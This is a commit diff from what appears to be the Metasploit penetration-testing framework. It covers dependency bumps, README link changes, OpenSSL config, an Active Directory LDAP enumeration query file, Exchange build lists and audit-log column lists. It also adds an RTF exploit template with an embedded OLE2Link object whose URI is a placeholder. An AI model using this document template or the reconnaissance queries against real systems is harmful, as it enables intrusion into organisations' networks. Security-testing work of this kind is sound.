 racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.3, MIT
-rack-protection, 2.2.0, MIT
-rack-test, 1.1.0, MIT
+rack, 2.2.4, MIT
+rack-protection, 2.2.2, MIT
+rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.2, MIT
-railties, 6.1.6, MIT
+rails-html-sanitizer, 1.4.3, MIT
+railties, 6.1.7, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
 recog, 2.3.23, unknown
 redcarpet, 3.5.1, MIT
-regexp_parser, 2.4.0, MIT
-reline, 0.2.5, ruby
+regexp_parser, 2.5.0, MIT
+reline, 0.3.1, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.28, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.30, "New BSD"
+rex-exploitation, 0.1.36, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
 rex-ole, 0.1.7, "New BSD"
-rex-powershell, 0.1.96, "New BSD"
-rex-random_identifier, 0.1.8, "New BSD"
+rex-powershell, 0.1.97, "New BSD"
+rex-random_identifier, 0.1.9, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.39, "New BSD"
-rex-sslscan, 0.1.7, "New BSD"
+rex-socket, 0.1.43, "New BSD"
+rex-sslscan, 0.1.8, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.37, "New BSD"
+rex-text, 0.2.45, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.11.0, MIT
 rspec-core, 3.11.0, MIT
-rspec-expectations, 3.11.0, MIT
+rspec-expectations, 3.11.1, MIT
 rspec-mocks, 3.11.1, MIT
 rspec-rails, 5.1.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.11.0, MIT
-rubocop, 1.29.1, MIT
-rubocop-ast, 1.18.0, MIT
+rspec-support, 3.11.1, MIT
+rubocop, 1.36.0, MIT
+rubocop-ast, 1.21.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.1.3, "New BSD"
+ruby_smb, 3.2.0, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
-sawyer, 0.8.2, MIT
+sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 2.2.0, MIT
-sqlite3, 1.4.2, "New BSD"
+sinatra, 2.2.2, MIT
+sqlite3, 1.5.0, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
-tilt, 2.0.10, MIT
+tilt, 2.0.11, MIT
 timecop, 0.9.5, MIT
-timeout, 0.2.0, "ruby, Simplified BSD"
+timeout, 0.3.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 2.0.4, MIT
-tzinfo-data, 1.2022.1, MIT
+tzinfo, 2.0.5, MIT
+tzinfo-data, 1.2022.3, MIT
 unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.1, MIT
-unicode-display_width, 2.1.0, MIT
+unf_ext, 0.0.8.2, MIT
+unicode-display_width, 2.2.0, MIT
 unix-crypt, 1.3.0, BSD
 warden, 1.2.9, MIT
 webrick, 1.7.0, "ruby, Simplified BSD"
@@ -196,5 +188,5 @@ windows_error, 0.1.4, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
-yard, 0.9.27, MIT
-zeitwerk, 2.5.4, MIT
+yard, 0.9.28, MIT
+zeitwerk, 2.6.0, MIT
@@ -3,25 +3,31 @@ Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.sv
 The Metasploit Framework is released under a BSD-style license. See
 [COPYING](COPYING) for more details.

-The latest version of this software is available from: https://metasploit.com
+The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

-Bug tracking and development information can be found at:
- https://github.com/rapid7/metasploit-framework
+You can find documentation on Metasploit and how to use it at:
+ https://docs.metasploit.com/
+
+Information about setting up a development environment can be found at:
+ https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+
+Our bug and feature request tracker can be found at:
+ https://github.com/rapid7/metasploit-framework/issues

 New bugs and feature requests should be directed to:
  https://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
-  https://rapid7.github.io/metasploit-framework/api
+  https://docs.metasploit.com/api/

 Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

 Installing
 --

-Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
+Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -29,21 +35,20 @@ Using Metasploit
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
 reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or the [wiki].
+resources](https://metasploit.github.io), or take a look at the
+[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
+page on the documentation website.

 Contributing
 --
-See the [Dev Environment Setup][wiki-devenv] guide on GitHub, which will
+See the [Dev Environment Setup][devenv] guide on GitHub, which will
 walk you through the whole process from installing all the
 dependencies, to cloning the repository, and finally to submitting a
 pull request. For slightly more information, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).


-[wiki]: https://github.com/rapid7/metasploit-framework/wiki
-[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
-[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
-[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
 [unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -1,3 +1,6 @@
+require 'fiddle'
+Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
+
 require 'rails'
 require File.expand_path('../boot', __FILE__)

@@ -0,0 +1,14 @@
+openssl_conf = openssl_init
+
+[openssl_init]
+providers = provider_sect
+
+[provider_sect]
+default = default_sect
+legacy = legacy_sect
+
+[default_sect]
+activate = 1
+
+[legacy_sect]
+activate = 1
@@ -0,0 +1,121 @@
+---
+queries:
+  - action: ENUM_ADCS_CAS
+    description: 'Enumerate ADCS certificate authorities.'
+    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pKIEnrollmentService)'
+    attributes:
+      - cn
+      - name
+      - cACertificateDN
+      - dNSHostname
+      - certificateTemplates
+  - action: ENUM_ADCS_CERT_TEMPLATES
+    description: 'Enumerate ADCS certificate templates.'
+    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pkicertificatetemplate)'
+    attributes:
+      - cn
+      - name
+      - displayName
+      - msPKI-Enrollment-Flag
+      - msPKI-Private-Key-Flag
+      - msPKI-Certificate-Name-Flag
+      - msPKI-RA-Signature
+      - pKIExtendedKeyUsage
+  - action: ENUM_ALL_OBJECT_CLASS
+    description: 'Dump all objects containing any objectClass field.'
+    filter: '(objectClass=*)'
+    attributes:
+      - dn
+      - objectClass
+  - action: ENUM_ALL_OBJECT_CATEGORY
+    description: 'Dump all objects containing any objectCategory field.'
+    filter: '(objectCategory=*)'
+    attributes:
+      - dn
+      - objectCategory
+  - action: ENUM_ACCOUNTS
+    description: 'Dump info about all known user accounts in the domain.'
+    filter: '(|(objectClass=organizationalPerson)(sAMAccountType=805306368))'
+    attributes:
+      - dn
+      - name
+      - displayName
+      - samAccountName
+      - userPrincipalName
+      - userAccountControl
+      - homeDirectory
+      - homeDrive
+      - profilePath
+  - action: ENUM_COMPUTERS
+    description: 'Dump all objects containing an objectCategory of Computer.'
+    filter: '(objectCategory=Computer)'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystemVersion
+      - operatingSystemServicePack
+  - action: ENUM_DOMAIN_CONTROLLERS
+    description: 'Dump all known domain controllers.'
+    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystemVersion
+      - operatingSystemServicePack
+  - action: ENUM_EXCHANGE_SERVERS
+    description: 'Dump info about all known Exchange servers.'
+    filter: '(&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystemVersion
+      - operatingSystemServicePack
+  - action: ENUM_EXCHANGE_RECIPIENTS
+    description: 'Dump info about all known Exchange recipients.'
+    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
+    attributes:
+      - dn
+      - mailNickname
+      - proxyAddresses
+      - name
+  - action: ENUM_GROUPS
+    description: 'Dump info about all known groups in the LDAP environment.'
+    filter: '(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup))'
+    attributes:
+      - dn
+      - name
+      - groupType
+      - memberof
+  - action: ENUM_ORGUNITS
+    description: 'Dump info about all known organizational units in the LDAP environment.'
+    filter: '(objectClass=organizationalUnit)'
+    attributes:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_ORGROLES
+    description: 'Dump info about all known organization roles in the LDAP environment.'
+    filter: '(objectClass=organizationalRole)'
+    attributes:
+      - dn
+      - displayName
+      - name
+      - description
@@ -0,0 +1,9 @@
+---
+queries:
+#  - action: SAMPLE_ACTION
+#    description: 'A description.'
+#    # base_dn_prefix: 'An optional string to prefix to the Base DN'
+#    filter: '(objectClass=*)'
+#    attributes:
+#      - dn
+#      - objectClass
@@ -186,6 +186,9 @@
    {
      "name": "Exchange Server 2013",
      "builds": [
+        "15.0.1497.40",
+        "15.0.1497.36",
+        "15.0.1497.33",
        "15.0.1497.28",
        "15.0.1497.26",
        "15.0.1497.24",
@@ -226,6 +229,12 @@
    {
      "name": "Exchange Server 2016",
      "builds": [
+        "15.1.2507.12",
+        "15.1.2507.9",
+        "15.1.2507.6",
+        "15.1.2375.31",
+        "15.1.2375.28",
+        "15.1.2375.24",
        "15.1.2375.18",
        "15.1.2375.17",
        "15.1.2375.12",
@@ -280,6 +289,12 @@
    {
      "name": "Exchange Server 2019",
      "builds": [
+        "15.2.1118.12",
+        "15.2.1118.9",
+        "15.2.1118.7",
+        "15.2.986.29",
+        "15.2.986.26",
+        "15.2.986.22",
        "15.2.986.15",
        "15.2.986.14",
        "15.2.986.9",
@@ -318,4 +333,4 @@
      "eol": false
    }
  ]
-}
+}
@@ -0,0 +1,30 @@
+{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
+\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
+4f4c45324c696e6b000000000000000000000c0000
+d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
+70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
+0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
+0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
+00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
+8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
+0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
+000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
+}}}}
@@ -0,0 +1,297 @@
+---
+AdapFileAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- SOURCE
+# - REMARKS
+# - OBJECT_SERVER
+# - OBJECT_TYPE
+# - HANDLE_ID
+# - OBJECT_NAME
+# - UNC_NAME
+# - FILE_NAME
+# - FILE_LOCATION
+# - LOGON_ID
+# - OPERATION_ID
+- PRIMARY_USER_NAME
+- PRIMARY_DOMAIN
+- PRIMARY_LOGIN_ID
+- CLIENT_USER_NAME
+- CLIENT_DOMAIN
+- CLIENT_LOGIN_ID
+- DOMAIN
+# - RESTRICTED_SID_COUNT
+# - ACCESSES
+# - PROCESS_ID
+# - PRIVILEGES_USED
+# - PRIVILEGES
+# - PROCESS_NAME
+# - NEW_SEC_DESC
+# - ORIGINAL_SEC_DESC
+# - NEW_PERMISSIONS
+# - ORIGINAL_PERMISSIONS
+# - ACL_CHANGE
+# - TRANSACTION_ID
+# - ACCESS_MASK
+- USERNAME
+# - RECORD_NUMBER
+- USER_SID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_TEXT
+# - FORMAT_MESSAGE
+- USER_SAM_ACCOUNT_NAME
+- USER_DISPLAY_NAME
+- USER_PRINCIPAL_NAME
+- USER_GUID
+- USER_DISTINGUISH_NAME
+- USER_OU_GUID
+- USER_DEPARTMENT
+- USER_MANAGER_NAME
+- SOURCE_NAME
+# - LOG_FILE_NAME
+# - KEYWORDS_NAME
+# - TASK_CATEGORY_NAME
+# - TASK_CATEGORY_ID
+# - FILE_TYPE
+- SHARE_NAME
+# - EXTRA_COLUMN1
+# - EXTRA_COLUMN2
+# - EXTRA_COLUMN3
+# - EXTRA_COLUMN4
+# - EXTRA_COLUMN5
+# - EXTRA_COLUMN6
+# - EXTRA_COLUMN7
+# - EXTRA_COLUMN8
+# - EXTRA_COLUMN9
+# - EXTRA_COLUMN10
+- CONFIGURED_DOMAIN_NAME
+# - NEW_PRIVILEGES_USED
+AdapPowershellAuditLog:
+- UNIQUE_ID
+# - COMMAND_NAME
+# - COMMAND_PATH
+# - COMMAND_TYPE
+# - COMMAND_INVOCATION
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_CATEGORY
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - HOST_APPLICATION
+- HOST_NAME
+# - SCRIPTBLOCK_ID
+# - RECORD_NUMBER
+# - SCRIPT_NAME
+# - SCRIPT_DATA
+# - SCRIPT_SNO
+# - SEVERITY
+# - TIME_GENERATED
+- CALLER_USER_NAME
+- CALLER_USER_SID
+# - TOTAL_NO
+# - MONITOR_ID
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - SCRIPT_DATA_JSON
+AdapSysmonAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - FORMAT_MESSAGE
+- CALLER_USER_SID
+- CALLER_USER_NAME
+- CALLER_USER_DOMAIN
+- CALLER_USER_LOGON_ID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- PROCESS_NAME
+- PARENT_PROCESS_NAME
+# - PROCESS_ID
+# - FILE_NAME
+# - INTEGRITY_LEVEL
+# - QUERY_STRING
+# - PARENT_PROCESS_ID
+# - PARENT_CMD_LINE
+# - QUERY_STATUS
+# - ACCESS_TYPE_TEXT
+# - ACCESS_TIME
+# - CREATION_TIME
+# - PREVIOUS_CREATION_TIME
+# - PROCESS_GUID
+# - RULE_NAME
+# - LOADED_FILE
+# - HASHED_VALUE
+# - FOLDER_PATH
+# - PARENT_PROCESS_GUID
+# - SESSION_ID
+# - IS_SIGNED
+# - SIGNATURE
+# - SIGNATURE_STATUS
+# - IS_ARCHIVED
+# - THREAD_ID
+- SOURCE_IP_ADDRESS
+# - PRODUCT_DESCRIPTION
+- DESTINATION_IP_ADDRESS
+- DESTINATION_HOST_NAME
+# - PORT_NUMBER
+# - PARENT_PORT_NUMBER
+# - REGISTRY_NAME
+# - QUERY_RESULT
+# - SCHEMA_VERSION
+# - WORKING_DIRECTORY
+- COMPANY_NAME
+- SOURCE_HOST_NAME
+- CALLER_USER_LOGON_GUID
+# - PARENT_PORT_NAME
+# - SERVICE_VERSION
+# - FILE_VERSION
+# - PRODUCT_NAME
+# - PORT_NAME
+AdapDNSAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - DNS_SETTING
+# - LOOKUP
+# - DNS_SCOPE
+# - DNS_OBJECT_GUID
+# - DISTINATION_ZONE
+# - OLD_DIRECTORY_PARTITION
+# - USER_ACTION
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_LOGON_ID
+# - DNS_QUERY_NAME
+# - OBJECT_CLASS_TEXT
+# - DNS_SETTING_NAME
+- DISTINGUISHED_NAME
+# - OBJECT_GUID
+# - DNS_ZONE_NAME
+# # - REGISTRY_VALUE
+# - FORMAT_MESSAGE
+# - RECORD_NUMBER
+- CALLER_USER_SID
+# - DNS_SETTING_VALUE
+# - CORRELATION_ID
+# - ATTRIBUTES_NEW_VALUE
+# - ATTRIBUTES_OLD_VALUE
+# - TTL_VALUE
+# - DNS_MGMT_TYPE
+# - DNS_ZONE_TYPE
+# - DNS_ZONE_TYPE_STRING
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_GUID
+# - OP_APPLN_CORRELATION_ID
+# - OP_TREE_DELETE
+# - DIRECTORY_PARTITION
+# - ROOT_CAUSE
+# - FILE_NAME
+# - VIRTUALIZATION_INSTANCE
+# - ERROR_CODE_TEXT
+# - DNS_RESPONSE_DATA
+- DNS_SERVER_NAME
+# - LINE_NUMBER
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+# - NEXT_SCAVENGE_SCHEDULE
+# - RECORD_NAME
+# - RUNNING_TIME
+# - TIME_OUT
+# - DNS_NODE
+# - DNS_ZONE_FILE
+- FOREST_NAME
+# - SCAVENGED_NODES
+# - SCAVENGED_PERC
+# - SCAVENGED_RECORDS
+# - SERVICE_NAMES
+# - SLEEPING_TIME
+# - VISITED_NODES
+# - VISITED_ZONES
+AdapADReplicationAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - REMARKS
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CALLER_USER_SID
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_LOGON_ID
+- CALLER_USER_GUID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+# - ALTERNATE_USER_ACTION
+# - DIRECTORY_PARTITION
+# - ERROR_CODE
+# - ERROR_CODE_TEXT
+# - EXTENDED_REQUEST_CODE
+# - FAILING_DNS_HOST
+# - HIGHEST_USN
+# - INTERSITE_TRANSPORT
+# - LAST_REPLICATION_DATE
+# - OBJECT_GUID
+# - OBJECT_NAME
+# - COMMON_NAME_PATH
+# - OPERATION
+# - REASON
+- REGISTRY_KEY
+# - REMOVE_LINGERING_OBJECTS
+# - SECONDARY_ERROR_VALUE
+- SERVICE_PRINCIPAL_NAME
+- SITE_NAME
+- SOURCE_DIRECTORY_SERVICE
+- SOURCE_DS_DOMAIN_NAME
+- SOURCE_DS_GUID
+- SOURCE_DS_NAME
+- SOURCE_DS_STARTING_ID
+# - THREAD_ID
+# - TIMEOUT_PERIOD
+# - TOMBSTONE_LIFE_TIME
+# - TRANSPORT_NAME
+# - USER_ACTION
+# - ATTRIBUTES_NAME
+# - ATTRIBUTES_VALUE
+# - SOURCE_DRA
+# - DESTINATION_DRA
+# - DESTINATION_DS_NAME
+# - DRS_OPTIONS
+# - REPL_EVENT_COUNT
+# - REPL_STATUS_CODE
+# - SESSION_ID
+# - START_USN
+# - END_USN
+# - TYPE_OF_CHANGE
@@ -0,0 +1,259 @@
+---
+DSPEmailAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - ATTACHMENT_ID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_MESSAGE
+# - PROCESS_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION_VALUE
+# - MAIL_CLASSFICATION
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+# - SOURCE_ID
+- USER_SID
+- USERNAME
+# - PROCESS_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+# - UNC_NAME
+# - LOCATION
+# - MESSAGE
+# - FILE_FOLDER_NAME
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - OLD_SHARE_PATH
+# - NEW_SHARE_PATH
+# - SHARE_ID
+# - IS_SUCCESS_EVENT
+# - IS_DIRECTORY
+# - IS_TRANSACTION
+# - ACTION_ID
+# - ACCESS_MASK
+# - THREAD_ID
+# - CALLBACK_MAJOR_ID
+# - CALLBACK_MINOR_ID
+# - PROFILE_ID
+# - USER_ID
+# - OLD_SACL
+# - NEW_SACL
+# - DIFF_SACL
+# - FILE_SIZE
+- CLIENT_IP
+- CLIENT_HOST
+- OWNER_INFO
+# - OTHERINFO_1
+# - OTHERINFO_2
+# - IS_SENSITIVE_DATA
+# - FILETYPE_EXTENSION
+# - FILETYPE_CATEGORY
+# - ACCESS_FROM
+# - EVENT_GENERATED_BY
+# - LOGIN_ID
+- LOGIN_NAME
+- OWNER_SID
+# - IS_USB_EVENT
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointClassificationReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
